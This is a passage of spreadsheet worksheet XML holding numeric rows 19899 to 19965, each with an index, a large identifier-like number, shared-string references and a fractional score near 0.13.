        <v>14388.0</v>
      </c>
      <c r="B19899" s="2">
        <v>3.9068571E7</v>
      </c>
      <c r="C19899" s="2" t="s">
        <v>19185</v>
      </c>
      <c r="D19899" s="2">
        <v>1.0</v>
      </c>
      <c r="E19899" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19899" s="2">
        <v>0.1305555555555555</v>
      </c>
    </row>
    <row r="19900" ht="15.75" customHeight="1">
      <c r="A19900" s="1">
        <v>15269.0</v>
      </c>
      <c r="B19900" s="2">
        <v>4.2346908E7</v>
      </c>
      <c r="C19900" s="2" t="s">
        <v>19186</v>
      </c>
      <c r="D19900" s="2">
        <v>1.0</v>
      </c>
      <c r="E19900" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19900" s="2">
        <v>0.1305555555555555</v>
      </c>
    </row>
    <row r="19901" ht="15.75" customHeight="1">
      <c r="A19901" s="1">
        <v>16184.0</v>
      </c>
      <c r="B19901" s="2">
        <v>4.5656941E7</v>
      </c>
      <c r="C19901" s="2" t="s">
        <v>19187</v>
      </c>
      <c r="D19901" s="2">
        <v>1.0</v>
      </c>
      <c r="E19901" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19901" s="2">
        <v>0.1305555555555555</v>
      </c>
    </row>
    <row r="19902" ht="15.75" customHeight="1">
      <c r="A19902" s="1">
        <v>1.0</v>
      </c>
      <c r="B19902" s="2">
        <v>1.0047445E7</v>
      </c>
      <c r="C19902" s="2" t="s">
        <v>19188</v>
      </c>
      <c r="D19902" s="2">
        <v>1.0</v>
      </c>
      <c r="E19902" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19902" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19903" ht="15.75" customHeight="1">
      <c r="A19903" s="1">
        <v>318.0</v>
      </c>
      <c r="B19903" s="2">
        <v>1.5703828E7</v>
      </c>
      <c r="C19903" s="2" t="s">
        <v>19189</v>
      </c>
      <c r="D19903" s="2">
        <v>1.0</v>
      </c>
      <c r="E19903" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19903" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19904" ht="15.75" customHeight="1">
      <c r="A19904" s="1">
        <v>502.0</v>
      </c>
      <c r="B19904" s="2">
        <v>1.8007905E7</v>
      </c>
      <c r="C19904" s="2" t="s">
        <v>19190</v>
      </c>
      <c r="D19904" s="2">
        <v>1.0</v>
      </c>
      <c r="E19904" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19904" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19905" ht="15.75" customHeight="1">
      <c r="A19905" s="1">
        <v>636.0</v>
      </c>
      <c r="B19905" s="2">
        <v>1.9729444E7</v>
      </c>
      <c r="C19905" s="2" t="s">
        <v>19191</v>
      </c>
      <c r="D19905" s="2">
        <v>1.0</v>
      </c>
      <c r="E19905" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19905" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19906" ht="15.75" customHeight="1">
      <c r="A19906" s="1">
        <v>1085.0</v>
      </c>
      <c r="B19906" s="2">
        <v>2.372625E7</v>
      </c>
      <c r="C19906" s="2" t="s">
        <v>19192</v>
      </c>
      <c r="D19906" s="2">
        <v>1.0</v>
      </c>
      <c r="E19906" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19906" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19907" ht="15.75" customHeight="1">
      <c r="A19907" s="1">
        <v>1806.0</v>
      </c>
      <c r="B19907" s="2">
        <v>2.9182743E7</v>
      </c>
      <c r="C19907" s="2" t="s">
        <v>19193</v>
      </c>
      <c r="D19907" s="2">
        <v>1.0</v>
      </c>
      <c r="E19907" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19907" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19908" ht="15.75" customHeight="1">
      <c r="A19908" s="1">
        <v>1894.0</v>
      </c>
      <c r="B19908" s="2">
        <v>2.9861087E7</v>
      </c>
      <c r="C19908" s="2" t="s">
        <v>19194</v>
      </c>
      <c r="D19908" s="2">
        <v>1.0</v>
      </c>
      <c r="E19908" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19908" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19909" ht="15.75" customHeight="1">
      <c r="A19909" s="1">
        <v>4188.0</v>
      </c>
      <c r="B19909" s="2">
        <v>4.1576079E7</v>
      </c>
      <c r="C19909" s="2" t="s">
        <v>19195</v>
      </c>
      <c r="D19909" s="2">
        <v>1.0</v>
      </c>
      <c r="E19909" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19909" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19910" ht="15.75" customHeight="1">
      <c r="A19910" s="1">
        <v>4210.0</v>
      </c>
      <c r="B19910" s="2">
        <v>4.1689299E7</v>
      </c>
      <c r="C19910" s="2" t="s">
        <v>19196</v>
      </c>
      <c r="D19910" s="2">
        <v>1.0</v>
      </c>
      <c r="E19910" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19910" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19911" ht="15.75" customHeight="1">
      <c r="A19911" s="1">
        <v>4788.0</v>
      </c>
      <c r="B19911" s="2">
        <v>4.3475522E7</v>
      </c>
      <c r="C19911" s="2" t="s">
        <v>19197</v>
      </c>
      <c r="D19911" s="2">
        <v>1.0</v>
      </c>
      <c r="E19911" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19911" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19912" ht="15.75" customHeight="1">
      <c r="A19912" s="1">
        <v>5237.0</v>
      </c>
      <c r="B19912" s="2">
        <v>4.501796E7</v>
      </c>
      <c r="C19912" s="2" t="s">
        <v>19198</v>
      </c>
      <c r="D19912" s="2">
        <v>1.0</v>
      </c>
      <c r="E19912" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19912" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19913" ht="15.75" customHeight="1">
      <c r="A19913" s="1">
        <v>5516.0</v>
      </c>
      <c r="B19913" s="2">
        <v>4.5855214E7</v>
      </c>
      <c r="C19913" s="2" t="s">
        <v>19199</v>
      </c>
      <c r="D19913" s="2">
        <v>1.0</v>
      </c>
      <c r="E19913" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19913" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19914" ht="15.75" customHeight="1">
      <c r="A19914" s="1">
        <v>5665.0</v>
      </c>
      <c r="B19914" s="2">
        <v>4.6325822E7</v>
      </c>
      <c r="C19914" s="2" t="s">
        <v>19200</v>
      </c>
      <c r="D19914" s="2">
        <v>1.0</v>
      </c>
      <c r="E19914" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19914" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19915" ht="15.75" customHeight="1">
      <c r="A19915" s="1">
        <v>5666.0</v>
      </c>
      <c r="B19915" s="2">
        <v>4.6333016E7</v>
      </c>
      <c r="C19915" s="2" t="s">
        <v>19201</v>
      </c>
      <c r="D19915" s="2">
        <v>1.0</v>
      </c>
      <c r="E19915" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19915" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19916" ht="15.75" customHeight="1">
      <c r="A19916" s="1">
        <v>5816.0</v>
      </c>
      <c r="B19916" s="2">
        <v>4.6847759E7</v>
      </c>
      <c r="C19916" s="2" t="s">
        <v>19202</v>
      </c>
      <c r="D19916" s="2">
        <v>1.0</v>
      </c>
      <c r="E19916" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19916" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19917" ht="15.75" customHeight="1">
      <c r="A19917" s="1">
        <v>6228.0</v>
      </c>
      <c r="B19917" s="2">
        <v>4.8035955E7</v>
      </c>
      <c r="C19917" s="2" t="s">
        <v>19203</v>
      </c>
      <c r="D19917" s="2">
        <v>1.0</v>
      </c>
      <c r="E19917" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19917" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19918" ht="15.75" customHeight="1">
      <c r="A19918" s="1">
        <v>6901.0</v>
      </c>
      <c r="B19918" s="2">
        <v>4.9809958E7</v>
      </c>
      <c r="C19918" s="2" t="s">
        <v>19204</v>
      </c>
      <c r="D19918" s="2">
        <v>1.0</v>
      </c>
      <c r="E19918" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19918" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19919" ht="15.75" customHeight="1">
      <c r="A19919" s="1">
        <v>7091.0</v>
      </c>
      <c r="B19919" s="2">
        <v>5.0302541E7</v>
      </c>
      <c r="C19919" s="2" t="s">
        <v>19205</v>
      </c>
      <c r="D19919" s="2">
        <v>1.0</v>
      </c>
      <c r="E19919" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19919" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19920" ht="15.75" customHeight="1">
      <c r="A19920" s="1">
        <v>7371.0</v>
      </c>
      <c r="B19920" s="2">
        <v>5.1040297E7</v>
      </c>
      <c r="C19920" s="2" t="s">
        <v>19206</v>
      </c>
      <c r="D19920" s="2">
        <v>1.0</v>
      </c>
      <c r="E19920" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19920" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19921" ht="15.75" customHeight="1">
      <c r="A19921" s="1">
        <v>7486.0</v>
      </c>
      <c r="B19921" s="2">
        <v>5.1366513E7</v>
      </c>
      <c r="C19921" s="2" t="s">
        <v>19207</v>
      </c>
      <c r="D19921" s="2">
        <v>1.0</v>
      </c>
      <c r="E19921" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19921" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19922" ht="15.75" customHeight="1">
      <c r="A19922" s="1">
        <v>9146.0</v>
      </c>
      <c r="B19922" s="2">
        <v>5.5264738E7</v>
      </c>
      <c r="C19922" s="2" t="s">
        <v>19208</v>
      </c>
      <c r="D19922" s="2">
        <v>1.0</v>
      </c>
      <c r="E19922" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19922" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19923" ht="15.75" customHeight="1">
      <c r="A19923" s="1">
        <v>9415.0</v>
      </c>
      <c r="B19923" s="2">
        <v>5.5785068E7</v>
      </c>
      <c r="C19923" s="2" t="s">
        <v>19209</v>
      </c>
      <c r="D19923" s="2">
        <v>1.0</v>
      </c>
      <c r="E19923" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19923" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19924" ht="15.75" customHeight="1">
      <c r="A19924" s="1">
        <v>10106.0</v>
      </c>
      <c r="B19924" s="2">
        <v>5.7236171E7</v>
      </c>
      <c r="C19924" s="2" t="s">
        <v>19210</v>
      </c>
      <c r="D19924" s="2">
        <v>1.0</v>
      </c>
      <c r="E19924" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19924" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19925" ht="15.75" customHeight="1">
      <c r="A19925" s="1">
        <v>11199.0</v>
      </c>
      <c r="B19925" s="2">
        <v>1.9929092E7</v>
      </c>
      <c r="C19925" s="2" t="s">
        <v>19211</v>
      </c>
      <c r="D19925" s="2">
        <v>1.0</v>
      </c>
      <c r="E19925" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19925" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19926" ht="15.75" customHeight="1">
      <c r="A19926" s="1">
        <v>12493.0</v>
      </c>
      <c r="B19926" s="2">
        <v>2.9546625E7</v>
      </c>
      <c r="C19926" s="2" t="s">
        <v>19212</v>
      </c>
      <c r="D19926" s="2">
        <v>1.0</v>
      </c>
      <c r="E19926" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19926" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19927" ht="15.75" customHeight="1">
      <c r="A19927" s="1">
        <v>12625.0</v>
      </c>
      <c r="B19927" s="2">
        <v>3.0238064E7</v>
      </c>
      <c r="C19927" s="2" t="s">
        <v>19213</v>
      </c>
      <c r="D19927" s="2">
        <v>1.0</v>
      </c>
      <c r="E19927" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19927" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19928" ht="15.75" customHeight="1">
      <c r="A19928" s="1">
        <v>12826.0</v>
      </c>
      <c r="B19928" s="2">
        <v>3.1629802E7</v>
      </c>
      <c r="C19928" s="2" t="s">
        <v>19214</v>
      </c>
      <c r="D19928" s="2">
        <v>1.0</v>
      </c>
      <c r="E19928" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19928" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19929" ht="15.75" customHeight="1">
      <c r="A19929" s="1">
        <v>14368.0</v>
      </c>
      <c r="B19929" s="2">
        <v>3.8960493E7</v>
      </c>
      <c r="C19929" s="2" t="s">
        <v>19215</v>
      </c>
      <c r="D19929" s="2">
        <v>1.0</v>
      </c>
      <c r="E19929" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19929" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19930" ht="15.75" customHeight="1">
      <c r="A19930" s="1">
        <v>14907.0</v>
      </c>
      <c r="B19930" s="2">
        <v>4.1184876E7</v>
      </c>
      <c r="C19930" s="2" t="s">
        <v>19216</v>
      </c>
      <c r="D19930" s="2">
        <v>1.0</v>
      </c>
      <c r="E19930" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19930" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19931" ht="15.75" customHeight="1">
      <c r="A19931" s="1">
        <v>14908.0</v>
      </c>
      <c r="B19931" s="2">
        <v>4.1184938E7</v>
      </c>
      <c r="C19931" s="2" t="s">
        <v>19216</v>
      </c>
      <c r="D19931" s="2">
        <v>1.0</v>
      </c>
      <c r="E19931" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19931" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19932" ht="15.75" customHeight="1">
      <c r="A19932" s="1">
        <v>15437.0</v>
      </c>
      <c r="B19932" s="2">
        <v>4.2981342E7</v>
      </c>
      <c r="C19932" s="2" t="s">
        <v>19217</v>
      </c>
      <c r="D19932" s="2">
        <v>1.0</v>
      </c>
      <c r="E19932" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19932" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19933" ht="15.75" customHeight="1">
      <c r="A19933" s="1">
        <v>25719.0</v>
      </c>
      <c r="B19933" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C19933" s="2" t="s">
        <v>19218</v>
      </c>
      <c r="D19933" s="2">
        <v>1.0</v>
      </c>
      <c r="E19933" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19933" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19934" ht="15.75" customHeight="1">
      <c r="A19934" s="1">
        <v>26516.0</v>
      </c>
      <c r="B19934" s="2">
        <v>1.7633074E7</v>
      </c>
      <c r="C19934" s="2" t="s">
        <v>19219</v>
      </c>
      <c r="D19934" s="2">
        <v>1.0</v>
      </c>
      <c r="E19934" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19934" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19935" ht="15.75" customHeight="1">
      <c r="A19935" s="1">
        <v>30213.0</v>
      </c>
      <c r="B19935" s="2">
        <v>3.7395961E7</v>
      </c>
      <c r="C19935" s="2" t="s">
        <v>19220</v>
      </c>
      <c r="D19935" s="2">
        <v>1.0</v>
      </c>
      <c r="E19935" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19935" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="19936" ht="15.75" customHeight="1">
      <c r="A19936" s="1">
        <v>4744.0</v>
      </c>
      <c r="B19936" s="2">
        <v>4.3372802E7</v>
      </c>
      <c r="C19936" s="2" t="s">
        <v>19221</v>
      </c>
      <c r="D19936" s="2">
        <v>1.0</v>
      </c>
      <c r="E19936" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19936" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="19937" ht="15.75" customHeight="1">
      <c r="A19937" s="1">
        <v>13818.0</v>
      </c>
      <c r="B19937" s="2">
        <v>3.6717428E7</v>
      </c>
      <c r="C19937" s="2" t="s">
        <v>19222</v>
      </c>
      <c r="D19937" s="2">
        <v>1.0</v>
      </c>
      <c r="E19937" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19937" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="19938" ht="15.75" customHeight="1">
      <c r="A19938" s="1">
        <v>15633.0</v>
      </c>
      <c r="B19938" s="2">
        <v>4.3579749E7</v>
      </c>
      <c r="C19938" s="2" t="s">
        <v>19223</v>
      </c>
      <c r="D19938" s="2">
        <v>1.0</v>
      </c>
      <c r="E19938" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19938" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="19939" ht="15.75" customHeight="1">
      <c r="A19939" s="1">
        <v>21831.0</v>
      </c>
      <c r="B19939" s="2">
        <v>2.6996954E7</v>
      </c>
      <c r="C19939" s="2" t="s">
        <v>19224</v>
      </c>
      <c r="D19939" s="2">
        <v>1.0</v>
      </c>
      <c r="E19939" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19939" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="19940" ht="15.75" customHeight="1">
      <c r="A19940" s="1">
        <v>856.0</v>
      </c>
      <c r="B19940" s="2">
        <v>2.1733228E7</v>
      </c>
      <c r="C19940" s="2" t="s">
        <v>19225</v>
      </c>
      <c r="D19940" s="2">
        <v>1.0</v>
      </c>
      <c r="E19940" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19940" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="19941" ht="15.75" customHeight="1">
      <c r="A19941" s="1">
        <v>1521.0</v>
      </c>
      <c r="B19941" s="2">
        <v>2.7407385E7</v>
      </c>
      <c r="C19941" s="2" t="s">
        <v>19226</v>
      </c>
      <c r="D19941" s="2">
        <v>1.0</v>
      </c>
      <c r="E19941" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19941" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="19942" ht="15.75" customHeight="1">
      <c r="A19942" s="1">
        <v>11429.0</v>
      </c>
      <c r="B19942" s="2">
        <v>2.1742706E7</v>
      </c>
      <c r="C19942" s="2" t="s">
        <v>19227</v>
      </c>
      <c r="D19942" s="2">
        <v>1.0</v>
      </c>
      <c r="E19942" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19942" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="19943" ht="15.75" customHeight="1">
      <c r="A19943" s="1">
        <v>18575.0</v>
      </c>
      <c r="B19943" s="2">
        <v>5.3243216E7</v>
      </c>
      <c r="C19943" s="2" t="s">
        <v>19228</v>
      </c>
      <c r="D19943" s="2">
        <v>1.0</v>
      </c>
      <c r="E19943" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19943" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="19944" ht="15.75" customHeight="1">
      <c r="A19944" s="1">
        <v>7941.0</v>
      </c>
      <c r="B19944" s="2">
        <v>5.2617833E7</v>
      </c>
      <c r="C19944" s="2" t="s">
        <v>19229</v>
      </c>
      <c r="D19944" s="2">
        <v>1.0</v>
      </c>
      <c r="E19944" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19944" s="2">
        <v>0.1299283154121865</v>
      </c>
    </row>
    <row r="19945" ht="15.75" customHeight="1">
      <c r="A19945" s="1">
        <v>2599.0</v>
      </c>
      <c r="B19945" s="2">
        <v>3.4382829E7</v>
      </c>
      <c r="C19945" s="2" t="s">
        <v>19230</v>
      </c>
      <c r="D19945" s="2">
        <v>1.0</v>
      </c>
      <c r="E19945" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19945" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="19946" ht="15.75" customHeight="1">
      <c r="A19946" s="1">
        <v>7052.0</v>
      </c>
      <c r="B19946" s="2">
        <v>5.0188345E7</v>
      </c>
      <c r="C19946" s="2" t="s">
        <v>19231</v>
      </c>
      <c r="D19946" s="2">
        <v>1.0</v>
      </c>
      <c r="E19946" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19946" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="19947" ht="15.75" customHeight="1">
      <c r="A19947" s="1">
        <v>14228.0</v>
      </c>
      <c r="B19947" s="2">
        <v>3.829206E7</v>
      </c>
      <c r="C19947" s="2" t="s">
        <v>19232</v>
      </c>
      <c r="D19947" s="2">
        <v>1.0</v>
      </c>
      <c r="E19947" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19947" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="19948" ht="15.75" customHeight="1">
      <c r="A19948" s="1">
        <v>24241.0</v>
      </c>
      <c r="B19948" s="2">
        <v>1.049981E7</v>
      </c>
      <c r="C19948" s="2" t="s">
        <v>19233</v>
      </c>
      <c r="D19948" s="2">
        <v>1.0</v>
      </c>
      <c r="E19948" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19948" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="19949" ht="15.75" customHeight="1">
      <c r="A19949" s="1">
        <v>26576.0</v>
      </c>
      <c r="B19949" s="2">
        <v>1.7890298E7</v>
      </c>
      <c r="C19949" s="2" t="s">
        <v>19234</v>
      </c>
      <c r="D19949" s="2">
        <v>1.0</v>
      </c>
      <c r="E19949" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19949" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="19950" ht="15.75" customHeight="1">
      <c r="A19950" s="1">
        <v>1119.0</v>
      </c>
      <c r="B19950" s="2">
        <v>2.4098523E7</v>
      </c>
      <c r="C19950" s="2" t="s">
        <v>19235</v>
      </c>
      <c r="D19950" s="2">
        <v>1.0</v>
      </c>
      <c r="E19950" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19950" s="2">
        <v>0.1293402777777778</v>
      </c>
    </row>
    <row r="19951" ht="15.75" customHeight="1">
      <c r="A19951" s="1">
        <v>30141.0</v>
      </c>
      <c r="B19951" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C19951" s="2" t="s">
        <v>19236</v>
      </c>
      <c r="D19951" s="2">
        <v>1.0</v>
      </c>
      <c r="E19951" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19951" s="2">
        <v>0.1291079812206573</v>
      </c>
    </row>
    <row r="19952" ht="15.75" customHeight="1">
      <c r="A19952" s="1">
        <v>3386.0</v>
      </c>
      <c r="B19952" s="2">
        <v>3.7958762E7</v>
      </c>
      <c r="C19952" s="2" t="s">
        <v>19237</v>
      </c>
      <c r="D19952" s="2">
        <v>1.0</v>
      </c>
      <c r="E19952" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19952" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="19953" ht="15.75" customHeight="1">
      <c r="A19953" s="1">
        <v>10529.0</v>
      </c>
      <c r="B19953" s="2">
        <v>1.222101E7</v>
      </c>
      <c r="C19953" s="2" t="s">
        <v>19238</v>
      </c>
      <c r="D19953" s="2">
        <v>1.0</v>
      </c>
      <c r="E19953" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19953" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="19954" ht="15.75" customHeight="1">
      <c r="A19954" s="1">
        <v>4392.0</v>
      </c>
      <c r="B19954" s="2">
        <v>4.2228011E7</v>
      </c>
      <c r="C19954" s="2" t="s">
        <v>19239</v>
      </c>
      <c r="D19954" s="2">
        <v>1.0</v>
      </c>
      <c r="E19954" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19954" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="19955" ht="15.75" customHeight="1">
      <c r="A19955" s="1">
        <v>4408.0</v>
      </c>
      <c r="B19955" s="2">
        <v>4.2281907E7</v>
      </c>
      <c r="C19955" s="2" t="s">
        <v>19240</v>
      </c>
      <c r="D19955" s="2">
        <v>1.0</v>
      </c>
      <c r="E19955" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19955" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="19956" ht="15.75" customHeight="1">
      <c r="A19956" s="1">
        <v>9220.0</v>
      </c>
      <c r="B19956" s="2">
        <v>5.5434233E7</v>
      </c>
      <c r="C19956" s="2" t="s">
        <v>19241</v>
      </c>
      <c r="D19956" s="2">
        <v>1.0</v>
      </c>
      <c r="E19956" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19956" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="19957" ht="15.75" customHeight="1">
      <c r="A19957" s="1">
        <v>14985.0</v>
      </c>
      <c r="B19957" s="2">
        <v>4.1409695E7</v>
      </c>
      <c r="C19957" s="2" t="s">
        <v>19242</v>
      </c>
      <c r="D19957" s="2">
        <v>1.0</v>
      </c>
      <c r="E19957" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19957" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="19958" ht="15.75" customHeight="1">
      <c r="A19958" s="1">
        <v>18408.0</v>
      </c>
      <c r="B19958" s="2">
        <v>5.2673619E7</v>
      </c>
      <c r="C19958" s="2" t="s">
        <v>19243</v>
      </c>
      <c r="D19958" s="2">
        <v>1.0</v>
      </c>
      <c r="E19958" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19958" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="19959" ht="15.75" customHeight="1">
      <c r="A19959" s="1">
        <v>29233.0</v>
      </c>
      <c r="B19959" s="2">
        <v>3.0832667E7</v>
      </c>
      <c r="C19959" s="2" t="s">
        <v>19244</v>
      </c>
      <c r="D19959" s="2">
        <v>1.0</v>
      </c>
      <c r="E19959" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19959" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="19960" ht="15.75" customHeight="1">
      <c r="A19960" s="1">
        <v>7564.0</v>
      </c>
      <c r="B19960" s="2">
        <v>5.1553734E7</v>
      </c>
      <c r="C19960" s="2" t="s">
        <v>19245</v>
      </c>
      <c r="D19960" s="2">
        <v>1.0</v>
      </c>
      <c r="E19960" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19960" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="19961" ht="15.75" customHeight="1">
      <c r="A19961" s="1">
        <v>16306.0</v>
      </c>
      <c r="B19961" s="2">
        <v>4.5912638E7</v>
      </c>
      <c r="C19961" s="2" t="s">
        <v>19246</v>
      </c>
      <c r="D19961" s="2">
        <v>1.0</v>
      </c>
      <c r="E19961" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19961" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="19962" ht="15.75" customHeight="1">
      <c r="A19962" s="1">
        <v>18560.0</v>
      </c>
      <c r="B19962" s="2">
        <v>5.3177373E7</v>
      </c>
      <c r="C19962" s="2" t="s">
        <v>19247</v>
      </c>
      <c r="D19962" s="2">
        <v>1.0</v>
      </c>
      <c r="E19962" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19962" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="19963" ht="15.75" customHeight="1">
      <c r="A19963" s="1">
        <v>19058.0</v>
      </c>
      <c r="B19963" s="2">
        <v>5.4596065E7</v>
      </c>
      <c r="C19963" s="2" t="s">
        <v>19248</v>
      </c>
      <c r="D19963" s="2">
        <v>1.0</v>
      </c>
      <c r="E19963" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19963" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="19964" ht="15.75" customHeight="1">
      <c r="A19964" s="1">
        <v>10958.0</v>
      </c>
      <c r="B19964" s="2">
        <v>1.7182729E7</v>
      </c>
      <c r="C19964" s="2" t="s">
        <v>19249</v>
      </c>
      <c r="D19964" s="2">
        <v>1.0</v>
      </c>
      <c r="E19964" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19964" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="19965" ht="15.75" customHeight="1">
      <c r="A19965" s="1">
        <v>11884.0</v>
      </c>
      <c r="B19965" s="2">
        <v>2.5086627E7</v>
      </c>
      <c r="C19965" s="2" t="s">
        <v>19250</v>
      </c>
      <c r="D19965" s="2">
        <v>1.0</v>
      </c>
      <c r="E19965" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19965" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="19966" ht="15.75" customHeight="1">
      <c r="A19966" s="1">
